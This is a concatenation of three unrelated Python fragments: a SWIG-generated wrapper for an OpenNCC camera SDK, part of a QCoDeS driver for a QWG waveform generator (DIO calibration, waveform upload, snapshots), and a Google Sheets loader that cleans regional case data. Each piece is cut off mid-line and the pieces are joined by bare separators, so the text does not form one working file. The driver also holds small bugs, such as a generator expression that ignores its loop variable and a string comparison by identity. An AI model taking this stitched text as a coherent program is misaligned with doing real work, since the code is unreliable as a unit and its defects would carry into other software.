imageWidth = _swig_property(_openncc.CameraInfo_imageWidth_get, _openncc.CameraInfo_imageWidth_set)
__swig_setmethods__["imageHeight"] = _openncc.CameraInfo_imageHeight_set
__swig_getmethods__["imageHeight"] = _openncc.CameraInfo_imageHeight_get
if _newclass:
imageHeight = _swig_property(_openncc.CameraInfo_imageHeight_get, _openncc.CameraInfo_imageHeight_set)
__swig_setmethods__["startX"] = _openncc.CameraInfo_startX_set
__swig_getmethods__["startX"] = _openncc.CameraInfo_startX_get
if _newclass:
startX = _swig_property(_openncc.CameraInfo_startX_get, _openncc.CameraInfo_startX_set)
__swig_setmethods__["startY"] = _openncc.CameraInfo_startY_set
__swig_getmethods__["startY"] = _openncc.CameraInfo_startY_get
if _newclass:
startY = _swig_property(_openncc.CameraInfo_startY_get, _openncc.CameraInfo_startY_set)
__swig_setmethods__["endX"] = _openncc.CameraInfo_endX_set
__swig_getmethods__["endX"] = _openncc.CameraInfo_endX_get
if _newclass:
endX = _swig_property(_openncc.CameraInfo_endX_get, _openncc.CameraInfo_endX_set)
__swig_setmethods__["endY"] = _openncc.CameraInfo_endY_set
__swig_getmethods__["endY"] = _openncc.CameraInfo_endY_get
if _newclass:
endY = _swig_property(_openncc.CameraInfo_endY_get, _openncc.CameraInfo_endY_set)
__swig_setmethods__["inputDimWidth"] = _openncc.CameraInfo_inputDimWidth_set
__swig_getmethods__["inputDimWidth"] = _openncc.CameraInfo_inputDimWidth_get
if _newclass:
inputDimWidth = _swig_property(_openncc.CameraInfo_inputDimWidth_get, _openncc.CameraInfo_inputDimWidth_set)
__swig_setmethods__["inputDimHeight"] = _openncc.CameraInfo_inputDimHeight_set
__swig_getmethods__["inputDimHeight"] = _openncc.CameraInfo_inputDimHeight_get
if _newclass:
inputDimHeight = _swig_property(_openncc.CameraInfo_inputDimHeight_get, _openncc.CameraInfo_inputDimHeight_set)
__swig_setmethods__["inputFormat"] = _openncc.CameraInfo_inputFormat_set
__swig_getmethods__["inputFormat"] = _openncc.CameraInfo_inputFormat_get
if _newclass:
inputFormat = _swig_property(_openncc.CameraInfo_inputFormat_get, _openncc.CameraInfo_inputFormat_set)
__swig_setmethods__["meanValue"] = _openncc.CameraInfo_meanValue_set
__swig_getmethods__["meanValue"] = _openncc.CameraInfo_meanValue_get
if _newclass:
meanValue = _swig_property(_openncc.CameraInfo_meanValue_get, _openncc.CameraInfo_meanValue_set)
__swig_setmethods__["stdValue"] = _openncc.CameraInfo_stdValue_set
__swig_getmethods__["stdValue"] = _openncc.CameraInfo_stdValue_get
if _newclass:
stdValue = _swig_property(_openncc.CameraInfo_stdValue_get, _openncc.CameraInfo_stdValue_set)
__swig_setmethods__["isOutputYUV"] = _openncc.CameraInfo_isOutputYUV_set
__swig_getmethods__["isOutputYUV"] = _openncc.CameraInfo_isOutputYUV_get
if _newclass:
isOutputYUV = _swig_property(_openncc.CameraInfo_isOutputYUV_get, _openncc.CameraInfo_isOutputYUV_set)
__swig_setmethods__["isOutputH26X"] = _openncc.CameraInfo_isOutputH26X_set
__swig_getmethods__["isOutputH26X"] = _openncc.CameraInfo_isOutputH26X_get
if _newclass:
isOutputH26X = _swig_property(_openncc.CameraInfo_isOutputH26X_get, _openncc.CameraInfo_isOutputH26X_set)
__swig_setmethods__["isOutputJPEG"] = _openncc.CameraInfo_isOutputJPEG_set
__swig_getmethods__["isOutputJPEG"] = _openncc.CameraInfo_isOutputJPEG_get
if _newclass:
isOutputJPEG = _swig_property(_openncc.CameraInfo_isOutputJPEG_get, _openncc.CameraInfo_isOutputJPEG_set)
__swig_setmethods__["mode"] = _openncc.CameraInfo_mode_set
__swig_getmethods__["mode"] = _openncc.CameraInfo_mode_get
if _newclass:
mode = _swig_property(_openncc.CameraInfo_mode_get, _openncc.CameraInfo_mode_set)
def __init__(self):
this = _openncc.new_CameraInfo()
try:
self.this.append(this)
except Exception:
self.this = this
__swig_destroy__ = _openncc.delete_CameraInfo
__del__ = lambda self: None
CameraInfo_swigregister = _openncc.CameraInfo_swigregister
CameraInfo_swigregister(CameraInfo)
_openncc.MAX_LABEL_SIZE_swigconstant(_openncc)
MAX_LABEL_SIZE = _openncc.MAX_LABEL_SIZE
_openncc.MAX_EXTINPUT_SIZE_swigconstant(_openncc)
MAX_EXTINPUT_SIZE = _openncc.MAX_EXTINPUT_SIZE
_openncc.MAX_OBJ_swigconstant(_openncc)
MAX_OBJ = _openncc.MAX_OBJ
class Network1Par(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Network1Par, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Network1Par, name)
__repr__ = _swig_repr
__swig_setmethods__["imageWidth"] = _openncc.Network1Par_imageWidth_set
__swig_getmethods__["imageWidth"] = _openncc.Network1Par_imageWidth_get
if _newclass:
imageWidth = _swig_property(_openncc.Network1Par_imageWidth_get, _openncc.Network1Par_imageWidth_set)
__swig_setmethods__["imageHeight"] = _openncc.Network1Par_imageHeight_set
__swig_getmethods__["imageHeight"] = _openncc.Network1Par_imageHeight_get
if _newclass:
imageHeight = _swig_property(_openncc.Network1Par_imageHeight_get, _openncc.Network1Par_imageHeight_set)
__swig_setmethods__["startX"] = _openncc.Network1Par_startX_set
__swig_getmethods__["startX"] = _openncc.Network1Par_startX_get
if _newclass:
startX = _swig_property(_openncc.Network1Par_startX_get, _openncc.Network1Par_startX_set)
__swig_setmethods__["startY"] = _openncc.Network1Par_startY_set
__swig_getmethods__["startY"] = _openncc.Network1Par_startY_get
if _newclass:
startY = _swig_property(_openncc.Network1Par_startY_get, _openncc.Network1Par_startY_set)
__swig_setmethods__["endX"] = _openncc.Network1Par_endX_set
__swig_getmethods__["endX"] = _openncc.Network1Par_endX_get
if _newclass:
endX = _swig_property(_openncc.Network1Par_endX_get, _openncc.Network1Par_endX_set)
__swig_setmethods__["endY"] = _openncc.Network1Par_endY_set
__swig_getmethods__["endY"] = _openncc.Network1Par_endY_get
if _newclass:
endY = _swig_property(_openncc.Network1Par_endY_get, _openncc.Network1Par_endY_set)
__swig_setmethods__["inputDimWidth"] = _openncc.Network1Par_inputDimWidth_set
__swig_getmethods__["inputDimWidth"] = _openncc.Network1Par_inputDimWidth_get
if _newclass:
inputDimWidth = _swig_property(_openncc.Network1Par_inputDimWidth_get, _openncc.Network1Par_inputDimWidth_set)
__swig_setmethods__["inputDimHeight"] = _openncc.Network1Par_inputDimHeight_set
__swig_getmethods__["inputDimHeight"] = _openncc.Network1Par_inputDimHeight_get
if _newclass:
inputDimHeight = _swig_property(_openncc.Network1Par_inputDimHeight_get, _openncc.Network1Par_inputDimHeight_set)
__swig_setmethods__["inputFormat"] = _openncc.Network1Par_inputFormat_set
__swig_getmethods__["inputFormat"] = _openncc.Network1Par_inputFormat_get
if _newclass:
inputFormat = _swig_property(_openncc.Network1Par_inputFormat_get, _openncc.Network1Par_inputFormat_set)
__swig_setmethods__["meanValue"] = _openncc.Network1Par_meanValue_set
__swig_getmethods__["meanValue"] = _openncc.Network1Par_meanValue_get
if _newclass:
meanValue = _swig_property(_openncc.Network1Par_meanValue_get, _openncc.Network1Par_meanValue_set)
__swig_setmethods__["stdValue"] = _openncc.Network1Par_stdValue_set
__swig_getmethods__["stdValue"] = _openncc.Network1Par_stdValue_get
if _newclass:
stdValue = _swig_property(_openncc.Network1Par_stdValue_get, _openncc.Network1Par_stdValue_set)
__swig_setmethods__["isOutputYUV"] = _openncc.Network1Par_isOutputYUV_set
__swig_getmethods__["isOutputYUV"] = _openncc.Network1Par_isOutputYUV_get
if _newclass:
isOutputYUV = _swig_property(_openncc.Network1Par_isOutputYUV_get, _openncc.Network1Par_isOutputYUV_set)
__swig_setmethods__["isOutputH26X"] = _openncc.Network1Par_isOutputH26X_set
__swig_getmethods__["isOutputH26X"] = _openncc.Network1Par_isOutputH26X_get
if _newclass:
isOutputH26X = _swig_property(_openncc.Network1Par_isOutputH26X_get, _openncc.Network1Par_isOutputH26X_set)
__swig_setmethods__["isOutputJPEG"] = _openncc.Network1Par_isOutputJPEG_set
__swig_getmethods__["isOutputJPEG"] = _openncc.Network1Par_isOutputJPEG_get
if _newclass:
isOutputJPEG = _swig_property(_openncc.Network1Par_isOutputJPEG_get, _openncc.Network1Par_isOutputJPEG_set)
__swig_setmethods__["mode"] = _openncc.Network1Par_mode_set
__swig_getmethods__["mode"] = _openncc.Network1Par_mode_get
if _newclass:
mode = _swig_property(_openncc.Network1Par_mode_get, _openncc.Network1Par_mode_set)
__swig_setmethods__["extInputs"] = _openncc.Network1Par_extInputs_set
__swig_getmethods__["extInputs"] = _openncc.Network1Par_extInputs_get
if _newclass:
extInputs = _swig_property(_openncc.Network1Par_extInputs_get, _openncc.Network1Par_extInputs_set)
__swig_setmethods__["modelCascade"] = _openncc.Network1Par_modelCascade_set
__swig_getmethods__["modelCascade"] = _openncc.Network1Par_modelCascade_get
if _newclass:
modelCascade = _swig_property(_openncc.Network1Par_modelCascade_get, _openncc.Network1Par_modelCascade_set)
__swig_setmethods__["inferenceACC"] = _openncc.Network1Par_inferenceACC_set
__swig_getmethods__["inferenceACC"] = _openncc.Network1Par_inferenceACC_get
if _newclass:
inferenceACC = _swig_property(_openncc.Network1Par_inferenceACC_get, _openncc.Network1Par_inferenceACC_set)
def __init__(self):
this = _openncc.new_Network1Par()
try:
self.this.append(this)
except Exception:
self.this = this
__swig_destroy__ = _openncc.delete_Network1Par
__del__ = lambda self: None
Network1Par_swigregister = _openncc.Network1Par_swigregister
Network1Par_swigregister(Network1Par)
class Network2Par(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Network2Par, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Network2Par, name)
__repr__ = _swig_repr
__swig_setmethods__["startXAdj"] = _openncc.Network2Par_startXAdj_set
__swig_getmethods__["startXAdj"] = _openncc.Network2Par_startXAdj_get
if _newclass:
startXAdj = _swig_property(_openncc.Network2Par_startXAdj_get, _openncc.Network2Par_startXAdj_set)
__swig_setmethods__["startYAdj"] = _openncc.Network2Par_startYAdj_set
__swig_getmethods__["startYAdj"] = _openncc.Network2Par_startYAdj_get
if _newclass:
startYAdj = _swig_property(_openncc.Network2Par_startYAdj_get, _openncc.Network2Par_startYAdj_set)
__swig_setmethods__["endXAdj"] = _openncc.Network2Par_endXAdj_set
__swig_getmethods__["endXAdj"] = _openncc.Network2Par_endXAdj_get
if _newclass:
endXAdj = _swig_property(_openncc.Network2Par_endXAdj_get, _openncc.Network2Par_endXAdj_set)
__swig_setmethods__["endYAdj"] = _openncc.Network2Par_endYAdj_set
__swig_getmethods__["endYAdj"] = _openncc.Network2Par_endYAdj_get
if _newclass:
endYAdj = _swig_property(_openncc.Network2Par_endYAdj_get, _openncc.Network2Par_endYAdj_set)
__swig_setmethods__["labelMask"] = _openncc.Network2Par_labelMask_set
__swig_getmethods__["labelMask"] = _openncc.Network2Par_labelMask_get
if _newclass:
labelMask = _swig_property(_openncc.Network2Par_labelMask_get, _openncc.Network2Par_labelMask_set)
__swig_setmethods__["minConf"] = _openncc.Network2Par_minConf_set
__swig_getmethods__["minConf"] = _openncc.Network2Par_minConf_get
if _newclass:
minConf = _swig_property(_openncc.Network2Par_minConf_get, _openncc.Network2Par_minConf_set)
__swig_setmethods__["inputDimWidth"] = _openncc.Network2Par_inputDimWidth_set
__swig_getmethods__["inputDimWidth"] = _openncc.Network2Par_inputDimWidth_get
if _newclass:
inputDimWidth = _swig_property(_openncc.Network2Par_inputDimWidth_get, _openncc.Network2Par_inputDimWidth_set)
__swig_setmethods__["inputDimHeight"] = _openncc.Network2Par_inputDimHeight_set
__swig_getmethods__["inputDimHeight"] = _openncc.Network2Par_inputDimHeight_get
if _newclass:
inputDimHeight = _swig_property(_openncc.Network2Par_inputDimHeight_get, _openncc.Network2Par_inputDimHeight_set)
__swig_setmethods__["inputFormat"] = _openncc.Network2Par_inputFormat_set
__swig_getmethods__["inputFormat"] = _openncc.Network2Par_inputFormat_get
if _newclass:
inputFormat = _swig_property(_openncc.Network2Par_inputFormat_get, _openncc.Network2Par_inputFormat_set)
__swig_setmethods__["meanValue"] = _openncc.Network2Par_meanValue_set
__swig_getmethods__["meanValue"] = _openncc.Network2Par_meanValue_get
if _newclass:
meanValue = _swig_property(_openncc.Network2Par_meanValue_get, _openncc.Network2Par_meanValue_set)
__swig_setmethods__["stdValue"] = _openncc.Network2Par_stdValue_set
__swig_getmethods__["stdValue"] = _openncc.Network2Par_stdValue_get
if _newclass:
stdValue = _swig_property(_openncc.Network2Par_stdValue_get, _openncc.Network2Par_stdValue_set)
__swig_setmethods__["extInputs"] = _openncc.Network2Par_extInputs_set
__swig_getmethods__["extInputs"] = _openncc.Network2Par_extInputs_get
if _newclass:
extInputs = _swig_property(_openncc.Network2Par_extInputs_get, _openncc.Network2Par_extInputs_set)
__swig_setmethods__["modelCascade"] = _openncc.Network2Par_modelCascade_set
__swig_getmethods__["modelCascade"] = _openncc.Network2Par_modelCascade_get
if _newclass:
modelCascade = _swig_property(_openncc.Network2Par_modelCascade_get, _openncc.Network2Par_modelCascade_set)
def __init__(self):
this = _openncc.new_Network2Par()
try:
self.this.append(this)
except Exception:
self.this = this
__swig_destroy__ = _openncc.delete_Network2Par
__del__ = lambda self: None
Network2Par_swigregister = _openncc.Network2Par_swigregister
Network2Par_swigregister(Network2Par)
class frameSpecOut(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, frameSpecOut, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, frameSpecOut, name)
__repr__ = _swig_repr
__swig_setmethods__["type"] = _openncc.frameSpecOut_type_set
__swig_getmethods__["type"] = _openncc.frameSpecOut_type_get
if _newclass:
type = _swig_property(_openncc.frameSpecOut_type_get, _openncc.frameSpecOut_type_set)
__swig_setmethods__["seqNo"] = _openncc.frameSpecOut_seqNo_set
__swig_getmethods__["seqNo"] = _openncc.frameSpecOut_seqNo_get
if _newclass:
seqNo = _swig_property(_openncc.frameSpecOut_seqNo_get, _openncc.frameSpecOut_seqNo_set)
__swig_setmethods__["size"] = _openncc.frameSpecOut_size_set
__swig_getmethods__["size"] = _openncc.frameSpecOut_size_get
if _newclass:
size = _swig_property(_openncc.frameSpecOut_size_get, _openncc.frameSpecOut_size_set)
__swig_setmethods__["res"] = _openncc.frameSpecOut_res_set
__swig_getmethods__["res"] = _openncc.frameSpecOut_res_get
if _newclass:
res = _swig_property(_openncc.frameSpecOut_res_get, _openncc.frameSpecOut_res_set)
def __init__(self):
this = _openncc.new_frameSpecOut()
try:
self.this.append(this)
except Exception:
self.this = this
__swig_destroy__ = _openncc.delete_frameSpecOut
__del__ = lambda self: None
frameSpecOut_swigregister = _openncc.frameSpecOut_swigregister
frameSpecOut_swigregister(frameSpecOut)
def GetYuvData(pbuf: 'char *') -> "int":
return _openncc.GetYuvData(pbuf)
GetYuvData = _openncc.GetYuvData
def GetMetaData(pbuf: 'char *') -> "int":
return _openncc.GetMetaData(pbuf)
GetMetaData = _openncc.GetMetaData
def GetH26xData(pbuf: 'char *') -> "int":
return _openncc.GetH26xData(pbuf)
GetH26xData = _openncc.GetH26xData
def GetJpegData(pbuf: 'char *') -> "int":
return _openncc.GetJpegData(pbuf)
GetJpegData = _openncc.GetJpegData
def get_sdk_version() -> "char *":
return _openncc.get_sdk_version()
get_sdk_version = _openncc.get_sdk_version
def load_fw(bootExe: 'char const *', firmware: 'char const *') -> "int":
return _openncc.load_fw(bootExe, firmware)
load_fw = _openncc.load_fw
def load_fwExt(bootExe: 'char const *', firmware: 'char const *', pid: 'int') -> "int":
return _openncc.load_fwExt(bootExe, firmware, pid)
load_fwExt = _openncc.load_fwExt
def sdk_init(cb: 'vscRecvCb', param: 'void *', blob_path: 'char const *', cam: 'CameraInfo', cam_Len: 'int') -> "int":
return _openncc.sdk_init(cb, param, blob_path, cam, cam_Len)
sdk_init = _openncc.sdk_init
def sdk_init_ex(cb: 'vscRecvCb', param: 'void *', blob_path: 'char const *', cam: 'Network1Par', cam_Len: 'int') -> "int":
return _openncc.sdk_init_ex(cb, param, blob_path, cam, cam_Len)
sdk_init_ex = _openncc.sdk_init_ex
def sdk_net2_init(cb: 'vscRecvCb', param: 'void *', blob_path: 'char const *', par: 'Network1Par', par_Len: 'int', blob2_path: 'char const *', par2: 'Network2Par', par2_Len: 'int') -> "int":
return _openncc.sdk_net2_init(cb, param, blob_path, par, par_Len, blob2_path, par2, par2_Len)
sdk_net2_init = _openncc.sdk_net2_init
def sdk_uninit() -> "void":
return _openncc.sdk_uninit()
sdk_uninit = _openncc.sdk_uninit
def get_usb_version() -> "int":
return _openncc.get_usb_version()
get_usb_version = _openncc.get_usb_version
def get_err_no() -> "int":
return _openncc.get_err_no()
get_err_no | |
QWG will continuously validate if the active index is still stable.\n
\t- If no suitable indexes are found FIXME is empty and an error is pushed onto the error stack\n
"""
self.write(f'DIO:CALibrate {target_index}')
# FIXME: define relation with mode and #codewords in use
# FIXME: provide high level function that performs the calibration
def dio_calibration_rapport(self, extended: bool=False) -> str:
"""
Return a string containing the latest DIO calibration report (successful and failed calibrations). Includes:
selected index, dio mode, valid indexes, calibrated DIO bits and the DIO bitDiff table.
:param extended: Adds more information about DIO: interboard and LVDS
:return: String of DIO calibration rapport
"""
info = f'- Calibrated: {self.dio_is_calibrated()}\n' \
f'- Mode: {self.dio_mode()}\n' \
f'- Selected index: {self.dio_active_index()}\n' \
f'- Suitable indexes: {self.dio_suitable_indexes()}\n' \
f'- Calibrated DIO bits: {bin(self.dio_calibrated_inputs())}\n' \
f'- DIO bit diff table:\n{self._dio_bit_diff_table()}'
if extended:
info += f'- LVDS detected: {self.dio_lvds()}\n' \
f'- Interboard detected: {self.dio_interboard()}'
return info
##########################################################################
# AWG5014 functions: WLIST (Waveform list)
##########################################################################
# FIXME: disabled, but supported by QWG
# def getWlistSize(self):
# return self.ask_int('wlist:size?')
def _getWlistName(self, idx):
"""
Args:
idx(int): 0..size-1
"""
return self.ask('wlist:name? %d' % idx)
def _getWlist(self):
"""
NB: takes a few seconds on 5014: our fault or Tek's?
"""
size = self.WlistSize()
wlist = [] # empty list
for k in range(size): # build list of names
wlist.append(self._getWlistName(k+1))
return wlist
def deleteWaveform(self, name):
"""
Args:
name (string): waveform name excluding double quotes, e.g.
'test'
"""
self.write('wlist:waveform:delete "%s"' % name)
def getWaveformType(self, name):
"""
Args:
name (string): waveform name excluding double quotes, e.g.
'*Sine100'
Returns:
'INT' or 'REAL'
"""
return self.ask('wlist:waveform:type? "%s"' % name)
def getWaveformLength(self, name):
"""
Args:
name (string): waveform name excluding double quotes, e.g.
'*Sine100'
"""
return self.ask_int('wlist:waveform:length? "%s"' % name)
def newWaveformReal(self, name, len):
"""
Args:
name (string): waveform name excluding double quotes, e.g.
'*Sine100'
NB: seems to do nothing (on Tek5014) if waveform already exists
"""
self.write('wlist:waveform:new "%s",%d,real' % (name, len))
def getWaveformDataFloat(self, name):
"""
Args:
name (string): waveform name excluding double quotes, e.g.
'*Sine100'
Returns:
waveform (np.array of float): waveform data
Compatibility: QWG
"""
self.write('wlist:waveform:data? "%s"' % name)
binBlock = self.binBlockRead()
waveform = np.frombuffer(binBlock, dtype=np.float32) # extract waveform
return waveform
def sendWaveformDataReal(self, name, waveform):
"""
send waveform and markers directly to AWG memory, i.e. not to a file
on the AWG disk.
NB: uses real data normalized to the range from -1 to 1 (independent
of number of DAC bits of AWG)
Args:
name (string): waveform name excluding double quotes, e.g. 'test'.
Must already exist in AWG
waveform (np.array of float)): vector defining the waveform,
normalized between -1.0 and 1.0
Compatibility: QWG
Based on:
Tektronix_AWG5014.py::send_waveform, which sends data to an AWG
_file_, not a memory waveform
'awg_transferRealDataWithMarkers', Author = <NAME>,
Compatibility = Tektronix AWG5014, AWG7102
"""
# generate the binblock
arr = np.asarray(waveform, dtype=np.float32)
binBlock = arr.tobytes()
# write binblock
hdr = f'wlist:waveform:data "{name}",'
self.binBlockWrite(binBlock, hdr)
def createWaveformReal(self, name, waveform):
"""
Convenience function to create a waveform in the AWG and then send
data to it
Args:
name(string): name of waveform for internal use by the AWG
waveform (float[numpoints]): vector defining the waveform,
normalized between -1.0 and 1.0
Compatibility: QWG
"""
wv_val = vals.Arrays(min_value=-1, max_value=1)
wv_val.validate(waveform)
maxWaveLen = 2**17-4 # FIXME: this is the hardware max
waveLen = len(waveform)
if waveLen > maxWaveLen:
raise ValueError(f'Waveform length ({waveLen}) must be < {maxWaveLen}')
self.newWaveformReal(name, waveLen)
self.sendWaveformDataReal(name, waveform)
##########################################################################
# Generic (i.e. at least AWG520 and AWG5014) Tektronix AWG functions
##########################################################################
# Tek_AWG functions: menu Setup|Waveform/Sequence
def loadWaveformOrSequence(self, awgFileName):
"""
awgFileName: name referring to AWG file system
"""
self.write('source:def:user "%s"' % awgFileName)
# NB: we only support default Mass Storage Unit Specifier "Main",
# which is the internal harddisk
##########################################################################
# private helpers
##########################################################################
@staticmethod
def _int_to_array(msg):
"""
Convert a scpi array of ints into a python int array
:param msg: scpi result
:return: array of ints
"""
if msg == "\"\"":
return []
return msg.split(',')
##########################################################################
# (sort of) private DIO functions
##########################################################################
def _dio_bit_diff_table(self):
"""
FOR DEVELOPMENT ONLY: Get the bit diff table of the last calibration
:return: String of the bitDiff table
"""
return self.ask("DIO:BDT").replace("\"", '').replace(",", "\n")
def _dio_calibrate_param(self, meas_time: float, nr_itr: int, target_index: int = ""):
"""
FOR DEVELOPMENT ONLY: Calibrate the DIO input signals with extra arguments.\n
Parameters:
\t meas_time: Measurement time between indexes in seconds, resolution of 1e-6 s
\tNote that when select a measurement time longer than 25e-2 S the scpi connection
will timeout, but the calibration is than still running. The timeout will happen on the
first `get` parameter after this call\n
\tnr_itr: Number of DIO signal data (bitDiffs) gathering iterations\n
\ttarget_index: DIO index which determines on which side of the edge to select the active index from\n
Calibration duration = meas_time * nr_itr * 20 * 1.1 (10% to compensate for log printing time)\n
"""
if meas_time < 1e-6:
raise ValueError(f"Cannot calibration inputs: meas time is too low; min 1e-6, actual: {meas_time}")
if nr_itr < 1:
raise ValueError(f"Cannot calibration inputs: nr_itr needs to be positive; actual: {nr_itr}")
if target_index is not "":
target_index = f",{target_index}"
self.write(f'DIO:CALibrate:PARam {meas_time},{nr_itr}{target_index}')
##########################################################################
# QCoDeS parameter support
##########################################################################
# overrides IPInstrument
def snapshot_base(self, update=False,
params_to_skip_update: Sequence[str] = None,
params_to_exclude: Sequence[str] = None) -> Dict:
"""
State of the instrument as a JSON-compatible dict.
Args:
update: If True, update the state by querying the
instrument. If False, just use the latest values in memory.
params_to_skip_update: List of parameter names that will be skipped
in update even if update is True. This is useful if you have
parameters that are slow to update but can be updated in a
different way (as in the qdac)
params_to_exclude: List of parameter names that will be excluded from the snapshot
Returns:
dict: base snapshot
"""
if params_to_skip_update is None:
params_to_skip_update = self._params_to_skip_update
# FIXME: Enable when QCodes PR #1653 is merged, see PycQED_py3 issue #566
# snap = super().snapshot_base(update=update,
# params_to_skip_update=params_to_skip_update)
# return snap
# FIXME: Workaround, remove when QCodes PR #1653 is merged, see PycQED_py3 issue #566
if params_to_exclude is None:
params_to_exclude = self._params_exclude_snapshot
#
snap = {
"functions": {name: func.snapshot(update=update)
for name, func in self.functions.items()},
"submodules": {name: subm.snapshot(update=update)
for name, subm in self.submodules.items()},
"__class__": full_class(self)
}
snap['parameters'] = {}
for name, param in self.parameters.items():
if params_to_exclude and name in params_to_exclude:
continue
if params_to_skip_update and name in params_to_skip_update:
update_par = False
else:
update_par = update
try:
snap['parameters'][name] = param.snapshot(update=update_par)
except:
# really log this twice. Once verbose for the UI and once
# at lower level with more info for file based loggers
logging.info(
"Snapshot: Could not update parameter: {}".format(name))
self.log.info(f"Details for Snapshot:",
exc_info=True)
snap['parameters'][name] = param.snapshot(update=False)
for attr in set(self._meta_attrs):
if hasattr(self, attr):
snap[attr] = getattr(self, attr)
snap['port'] = self._port
snap['confirmation'] = self._confirmation
snap['address'] = self._address
snap['terminator'] = self._terminator
snap['timeout'] = self._timeout
snap['persistent'] = self._persistent
return snap
# FIXME: End remove
##########################################################################
# QCoDeS parameter helpers
##########################################################################
def _set_cw_waveform(self, ch: int, cw: int, waveform):
wf_name = 'wave_ch{}_cw{:03}'.format(ch, cw)
cw_cmd = 'sequence:element{:d}:waveform{:d}'.format(cw, ch)
self.createWaveformReal(wf_name, waveform)
self.write(cw_cmd + ' "{:s}"'.format(wf_name))
def _get_cw_waveform(self, ch: int, cw: int):
wf_name = 'wave_ch{}_cw{:03}'.format(ch, cw)
return self.getWaveformDataFloat(wf_name)
def _setMatrix(self, chPair, mat):
"""
Args:
chPair(int): ckannel pair for operation, 1 or 3
matrix(np.matrix): 2x2 matrix for mixer calibration
"""
# function used internally for the parameters because of formatting
self.write('qutech:output{:d}:matrix {:f},{:f},{:f},{:f}'.format(
chPair, mat[0, 0], mat[1, 0], mat[0, 1], mat[1, 1]))
def _getMatrix(self, chPair):
# function used internally for the parameters because of formatting
mstring = self.ask(f'qutech:output{chPair}:matrix?')
M = np.zeros(4)
for i, x in enumerate(mstring.split(',')):
M[i] = x
M = M.reshape(2, 2, order='F')
return (M)
def _setCodewordProtocol(self, protocol_name):
"""
Args:
protocol_name(string): Name of the predefined protocol
"""
# function used internally for the parameters because of formatting
protocol = self.codeword_protocols.get(protocol_name)
if protocol is None:
allowed_protocols = ", ".join(f'{protocol_name}' for protocols_name in self.codeword_protocols)
raise ValueError(f"Invalid protocol: actual: {protocol_name}, expected: {allowed_protocols}")
for ch, bitMap in enumerate(protocol):
self.set(f"ch{ch | |
<gh_stars>1-10
import json
import pickle
import os.path
import configparser
import pandas as pd
import re
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from datetime import datetime, timedelta
from shutil import copyfile
class GoogleSheet(object):
'''
Simple object to help organizing.
Attributes:
:spreadsheetid:-> str, Google Spreadsheet ID (from link).
:name: -> list or str, sheet name (list when multiple sheets in 1 spreadsheet).
:ID: -> str, code for ID column in sheets (specific to region).
'''
def __init__(self, *args):
self.spreadsheetid = args[0]
self.name = args[1]
self.ID = args[2]
def get_GoogleSheets(config: configparser.ConfigParser) -> GoogleSheet:
'''
Fetch info for the different sheets.
'''
# fetch for original sheet (temporary as things will get migrated)
sheet0 = config['ORIGINAL_SHEET']
name1 = sheet0.get('NAME1')
name2 = sheet0.get('NAME2')
sid = sheet0.get('SID')
ID = sheet0.get('ID')
s1 = GoogleSheet(sid, name1, ID)
s2 = GoogleSheet(sid, name2, ID)
sheets = [s1, s2] # change to blank when no longer using original.
# Fetch for Regional Sheets.
pattern = '^SHEET\d*$'
sections = config.sections()
for s in sections:
if re.match(pattern, s):
id_ = config[s]['ID']
sid = config[s]['SID']
name = config[s]['NAME']
googlesheet = GoogleSheet(sid, name, id_)
sheets.append(googlesheet)
return sheets
def log_message(message: str, config: configparser.ConfigParser) -> None:
logfile = config['FILES'].get('LOG', './logfile')
date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
message = '{} {}'.format(date, message)
with open(logfile, 'a') as F:
F.write(message)
F.write('\n')
def savedata(data: list, outfile: str) -> None:
'''
dave data to file.
'''
with open(outfile, 'w') as F:
json.dump(data, F)
def load_sheet(Sheet: GoogleSheet, config: configparser.ConfigParser) -> pd.DataFrame:
# Sheet Import Script adapted from : https://developers.google.com/sheets/api/quickstart/python
scopes = ['https://www.googleapis.com/auth/spreadsheets.readonly']
creds = None
token = config['SHEETS'].get('TOKEN', './token.pickle')
credentials = config['SHEETS'].get('CREDENTIALS', './credentials.json')
spreadsheetid = Sheet.spreadsheetid
data_range = f'{Sheet.name}!A:V'
if os.path.exists(token):
with open(token, 'rb') as t:
creds = pickle.load(t)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
credentials, scopes)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open(token, 'wb') as t:
pickle.dump(creds, t)
service = build('sheets', 'v4', credentials=creds)
# Call the Sheets API
sheet = service.spreadsheets()
values = sheet.values().get(spreadsheetId=spreadsheetid, range=data_range).execute().get('values', [])
if not values:
raise ValueError('Sheet data not found')
else:
# Have to loop through values because they don't necessarily match the the column number.
columns = values[0]
data = values[1:]
n = len(columns)
ilat = columns.index('latitude')
ilon = columns.index('longitude')
idate = columns.index('date_confirmation')
keep = []
for _ in data:
d = _.copy() # might change the value.
# Flags to write to log accurately.
length_error = False
lat_error = False
date_error = False
try:
# Length Errors
# Trailing empty cells return a different length than otherwise
length_error = True
if len(d) < n :
# extend with empty strings
nstrings = n - len(d)
d.extend(['']*nstrings)
assert len(d) == n
length_error = False
# Lat/Long errors
lat_error = True
_ = float(d[ilat])
_ = float(d[ilon])
lat_error = False
# Dates
date_error = True
date = d[idate]
if date == '':
continue
elif '-' in d[idate]:
date = d[idate].split('-')[-1]
else:
date = d[idate]
_ = pd.to_datetime(date, format='%d.%m.%Y', exact=True)
date_error = False
keep.append(d)
except Exception as Err:
if True in [length_error, lat_error, date_error]:
continue
else:
raise Err
for x, y in enumerate(columns):
if y.strip() == '' and columns[x-1] == 'province':
columns[x] = 'country'
return pd.DataFrame(data=keep, columns=columns)
def clean_data(data: pd.DataFrame, colnames: list) -> pd.DataFrame:
'''
Basic cleaning and filtering on dataframe.
Most of this gets done either by curators or pipeline now, this filters out for :
- valid lat/longs
- valid dates (using %d.%m.%Y format)
- manage white space
- Keeps only columns that are going to be in final version.
Args
